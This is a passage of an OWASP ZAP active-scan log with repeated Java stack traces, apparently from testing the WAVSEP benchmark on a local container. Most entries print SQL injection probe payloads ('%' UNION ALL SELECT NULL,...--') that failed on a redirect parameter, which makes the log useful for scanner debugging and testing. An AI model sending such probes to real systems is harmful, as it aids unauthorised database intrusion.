NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681416 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681416 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681417 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681418 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681418 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681419 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681419 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681420 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681420 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681421 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681422 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681423 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681424 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' UNION ALL SELECT 